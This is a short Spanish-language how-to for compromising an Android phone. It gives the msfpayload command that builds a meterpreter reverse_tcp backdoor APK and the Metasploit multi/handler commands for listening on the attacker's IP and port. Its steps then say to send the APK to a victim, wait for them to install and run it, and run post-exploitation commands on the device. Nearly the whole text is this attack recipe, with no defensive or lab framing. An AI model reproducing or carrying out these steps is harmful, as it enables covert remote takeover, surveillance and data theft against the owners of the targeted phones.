1. Crear un backdoor apk

sudo msfpayload android/meterpreter/reverse_tcp LHOST=[Hacker_IP] LPORT=[Hacker_Port] R > app.apk

2. Correr la consola de Metasploit

msfconsole

3. Correr los siguiente comando para escuchar la conexión de entrada de android

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [Hacker_IP]
set LPORT [Hacker_Port]

4. Enviar el *.apk a la victima con dispositivo Android

5. Esperar que la víctima instale y corra la aplicación

6. Mira tu msfconsole, y se habrá conectado el dispositivo Android

7. Correr cualquier comando post-explotación